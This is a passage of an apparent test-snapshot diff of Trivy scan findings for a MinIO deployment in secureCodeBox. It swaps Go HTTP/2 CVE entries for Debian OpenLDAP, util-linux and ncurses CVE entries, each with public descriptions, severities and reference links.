"https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "http://rhn.redhat.com/errata/RHSA-2015-2131.html", + "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html", + "http://www.securitytracker.com/id/1034221", + "https://access.redhat.com/security/cve/CVE-2015-3276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1238322", + "https://linux.oracle.com/cve/CVE-2015-3276.html", + "https://linux.oracle.com/errata/ELSA-2015-2131.html", + "https://nvd.nist.gov/vuln/detail/CVE-2015-3276", + "https://www.cve.org/CVERecord?id=CVE-2015-3276", ], }, "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "description": "The nss_parse_ciphers function in libraries/libldap/tls_m.c in OpenLDAP does not properly parse OpenSSL-style multi-keyword mode cipher strings, which might cause a weaker than intended cipher to be used and allow remote attackers to have unspecified impact via unknown vectors.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", + "name": "incorrect multi-keyword mode cipherstring parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://avd.aquasec.com/nvd/cve-2015-3276", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "http://rhn.redhat.com/errata/RHSA-2015-2131.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "http://www.securitytracker.com/id/1034221", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://access.redhat.com/security/cve/CVE-2015-3276", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1238322", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://linux.oracle.com/cve/CVE-2015-3276.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://linux.oracle.com/errata/ELSA-2015-2131.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2015-3276", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://www.cve.org/CVERecord?id=CVE-2015-3276", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-14159", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", + "references": [ + "http://www.openldap.org/its/index.cgi?findid=8703", + "https://access.redhat.com/security/cve/CVE-2017-14159", + "https://nvd.nist.gov/vuln/detail/CVE-2017-14159", + "https://www.cve.org/CVERecord?id=CVE-2017-14159", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + ], + }, + "category": "Vulnerability", + "description": "slapd in OpenLDAP 2.4.45 and earlier creates a PID file after dropping privileges to a non-root account, which might allow local users to kill arbitrary processes by leveraging access to this non-root account for PID file modification before a root script executes a "kill \`cat /pathname\`" command, as demonstrated by openldap-initscript.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "openldap: Privilege escalation via PID file manipulation", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://avd.aquasec.com/nvd/cve-2017-14159", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "http://www.openldap.org/its/index.cgi?findid=8703", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://access.redhat.com/security/cve/CVE-2017-14159", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-14159", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-14159", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-17740", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00053.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00058.html", + "http://www.openldap.org/its/index.cgi/Incoming?id=8759", + "https://access.redhat.com/security/cve/CVE-2017-17740", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "https://nvd.nist.gov/vuln/detail/CVE-2017-17740", + "https://www.cve.org/CVERecord?id=CVE-2017-17740", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + ], + }, + "category": "Vulnerability", + "description": "contrib/slapd-modules/nops/nops.c in OpenLDAP through 2.4.45, when both the nops module and the memberof overlay are enabled, attempts to free a buffer that was allocated on the stack, which allows remote attackers to cause a denial of service (slapd crash) via a member MODDN operation.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "openldap: contrib/slapd-modules/nops/nops.c attempts to free stack buffer allowing remote attackers to cause a denial of service", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://avd.aquasec.com/nvd/cve-2017-17740", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00053.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00058.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "http://www.openldap.org/its/index.cgi/Incoming?id=8759", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://access.redhat.com/security/cve/CVE-2017-17740", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-17740", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-17740", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-15719", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00033.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00059.html", + "https://access.redhat.com/errata/RHBA-2019:3674", + "https://access.redhat.com/security/cve/CVE-2020-15719", + "https://bugs.openldap.org/show_bug.cgi?id=9266", + "https://bugzilla.redhat.com/show_bug.cgi?id=1740070", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "https://nvd.nist.gov/vuln/detail/CVE-2020-15719", + "https://www.cve.org/CVERecord?id=CVE-2020-15719", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + ], + }, + "category": "Vulnerability", + "description": "libldap in certain third-party OpenLDAP packages has a certificate-validation flaw when the third-party package is asserting RFC6125 support. It considers CN even when there is a non-matching subjectAltName (SAN). This is fixed in, for example, openldap-2.4.46-10.el8 in Red Hat Enterprise Linux.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "openldap: Certificate validation incorrectly matches name against CN-ID", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://avd.aquasec.com/nvd/cve-2020-15719", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00033.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00059.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://access.redhat.com/errata/RHBA-2019:3674", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://access.redhat.com/security/cve/CVE-2020-15719", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://bugs.openldap.org/show_bug.cgi?id=9266", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1740070", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-15719", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-15719", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "libmount1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "6.2+20201114-2+deb11u1", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-29458", + "installedVersion": "6.2+20201114-2", + "packageName": "libncurses6", + "references": [ + "http://seclists.org/fulldisclosure/2022/Oct/41", + "https://access.redhat.com/security/cve/CVE-2022-29458", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "https://support.apple.com/kb/HT213488", + "https://ubuntu.com/security/notices/USN-5477-1", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29458", + ], + }, + "category": "Vulnerability", + "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "ncurses: segfaulting OOB read", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://avd.aquasec.com/nvd/cve-2022-29458", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://access.redhat.com/security/cve/CVE-2022-29458", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41721", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41721", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", - "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", - "https://go.dev/cl/447396", - "https://go.dev/issue/56352", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", - "https://pkg.go.dev/vuln/GO-2023-1495", - "https://www.cve.org/CVERecord?id=CVE-2022-41721", - ], - }, - "category": "Vulnerability", - "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "request smuggling", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41721", + "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41721", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", }, { "type": "URL", - "value": "https://go.dev/cl/447396", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", }, { "type": "URL", - "value": "https://go.dev/issue/56352", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "value": "https://ubuntu.com/security/notices/USN-5477-1", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1495", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29491", + "installedVersion": "6.2+20201114-2", + "packageName": "libncurses6", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "https://access.redhat.com/security/cve/CVE-2023-29491", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "https://security.netapp.com/advisory/ntap-20230517-0009/", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "https://www.openwall.com/lists/oss-security/2023/04/13/4", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "Local users can trigger security-relevant memory corruption via malformed data", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "https://avd.aquasec.com/nvd/cve-2023-29491", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://access.redhat.com/security/cve/CVE-2023-29491", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": "6.2+20201114-2+deb11u1", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-29458", + "installedVersion": "6.2+20201114-2", + "packageName": "libncursesw6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "http://seclists.org/fulldisclosure/2022/Oct/41", + "https://access.redhat.com/security/cve/CVE-2022-29458", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "https://support.apple.com/kb/HT213488", + "https://ubuntu.com/security/notices/USN-5477-1", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29458", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "ncurses: segfaulting OOB read", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://avd.aquasec.com/nvd/cve-2022-29458", + }, + { + "type": "URL", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-29458", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + }, + { + "type": "URL", + "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://ubuntu.com/security/notices/USN-5477-1", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29491", + "installedVersion": "6.2+20201114-2", + "packageName": "libncursesw6", + "references": [ + "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "https://access.redhat.com/security/cve/CVE-2023-29491", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + 